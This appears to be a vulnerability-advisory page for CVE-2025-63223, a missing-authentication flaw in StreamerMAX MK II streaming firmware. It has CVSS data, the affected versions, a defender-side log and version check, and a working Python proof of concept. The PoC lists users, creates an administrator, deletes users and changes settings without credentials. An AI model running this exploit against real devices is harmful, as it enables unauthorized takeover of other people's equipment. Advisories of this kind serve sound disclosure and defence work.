Security Vulnerability Report
CVE-2025-63223 CVSS 9.8 CRITICAL

Published: 2025-11-19 16:15:48
Last Modified: 2026-01-15 19:38:38

Description

The Axel Technology StreamerMAX MK II devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:axeltechnology:streamermax_mk_ii_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:axeltechnology:streamermax_mk_ii:-:*:*:*:*:*:*:* - NOT VULNERABLE
StreamerMAX MK II Firmware 0.8.5
StreamerMAX MK II Firmware 0.9.0
StreamerMAX MK II Firmware 0.9.5
StreamerMAX MK II Firmware 1.0.0
StreamerMAX MK II Firmware 1.0.1
StreamerMAX MK II Firmware 1.0.2
StreamerMAX MK II Firmware 1.0.3
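An added defender-side check, not part of this advisory or of the PoC below: it tests a reported firmware version against the inclusive affected range (0.8.5 to 1.0.3) and sweeps web-server access logs for requests to the unauthenticated endpoint that did not come from a management network. It assumes Common Log Format lines with numeric client addresses; the management network and the sample log lines are constructed for the example.

```python
import ipaddress
import re

# Added example, not part of the advisory: an inventory check against the
# affected firmware range and a log sweep for hits on the exposed endpoint.
AFFECTED_MIN = (0, 8, 5)  # versionStartIncluding from the advisory
AFFECTED_MAX = (1, 0, 3)  # versionEndIncluding from the advisory
ENDPOINT = "/cgi-bin/gstFcgi.fcgi"

def parse_version(text):
    """Turn '1.0.3' into (1, 0, 3) so comparison is numeric, not lexical."""
    return tuple(int(p) for p in text.strip().split("."))

def is_affected(version):
    """True when the firmware version is inside the inclusive affected range."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX

# Common Log Format: client ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def flag_requests(log_lines, management_nets):
    """Return (client, method, path, status) for each request to the
    endpoint from outside the management networks; each needs follow-up."""
    nets = [ipaddress.ip_network(n) for n in management_nets]
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; skip rather than crash on odd lines
        client, _ts, method, path, status = m.groups()
        if path.split("?", 1)[0] != ENDPOINT:
            continue  # compare the path without any query string
        if any(ipaddress.ip_address(client) in net for net in nets):
            continue  # expected management-network traffic
        findings.append((client, method, path, int(status)))
    return findings

# Constructed sample log lines (not captured from a real device).
SAMPLE_LOG = [
    '10.0.5.20 - - [20/Nov/2025:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.5.20 - - [20/Nov/2025:10:01:05 +0000] "POST /cgi-bin/gstFcgi.fcgi HTTP/1.1" 200 88',
    '203.0.113.7 - - [20/Nov/2025:10:07:41 +0000] "POST /cgi-bin/gstFcgi.fcgi HTTP/1.1" 200 91',
    '203.0.113.7 - - [20/Nov/2025:10:07:44 +0000] "POST /cgi-bin/gstFcgi.fcgi?x=1 HTTP/1.1" 200 91',
    'garbage line that does not parse',
]
```

Because the endpoint requires no credentials, every hit from outside the management network is worth reviewing, not only the ones with an error status.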

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-63223 PoC - Axel StreamerMAX MK II Broken Access Control
# Target: /cgi-bin/gstFcgi.fcgi endpoint

TARGET = "http://<target-ip>"
ENDPOINT = "/cgi-bin/gstFcgi.fcgi"


def list_users():
    """List all user accounts on the device"""
    payload = {
        "command": "list_users",
        "type": "user_management"
    }
    response = requests.post(f"{TARGET}{ENDPOINT}", data=payload, timeout=10)
    print(f"[+] User List Response: {response.text}")
    return response


def create_admin(username, password):
    """Create new administrator account"""
    payload = {
        "command": "create_admin",
        "username": username,
        "password": password,
        "type": "user_management"
    }
    response = requests.post(f"{TARGET}{ENDPOINT}", data=payload, timeout=10)
    print(f"[+] Create Admin Response: {response.text}")
    return response


def delete_user(username):
    """Delete specified user account"""
    payload = {
        "command": "delete_user",
        "username": username,
        "type": "user_management"
    }
    response = requests.post(f"{TARGET}{ENDPOINT}", data=payload, timeout=10)
    print(f"[+] Delete User Response: {response.text}")
    return response


def modify_settings(setting_name, value):
    """Modify system settings"""
    payload = {
        "command": "modify_settings",
        "setting": setting_name,
        "value": value,
        "type": "config_management"
    }
    response = requests.post(f"{TARGET}{ENDPOINT}", data=payload, timeout=10)
    print(f"[+] Modify Settings Response: {response.text}")
    return response


if __name__ == "__main__":
    print("[*] CVE-2025-63223 PoC - StreamerMAX MK II Broken Access Control")
    print("[*] Target:", TARGET)

    # Step 1: List users
    print("\n[*] Step 1: Listing user accounts...")
    list_users()

    # Step 2: Create new admin
    print("\n[*] Step 2: Creating new administrator...")
    create_admin("hacker", "P@ssw0rd123")

    # Step 3: Modify settings
    print("\n[*] Step 3: Modifying system settings...")
    modify_settings("admin_access", "enabled")
```

Weakness

CWE-284 (Improper Access Control)

References

https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63223_Axel%20Technology%20StreamerMAX%20MK%20II%20-%20Broken%20Access%20Control (Exploit, Third Party Advisory, Mitigation)
https://www.axeltechnology.com/ (Product)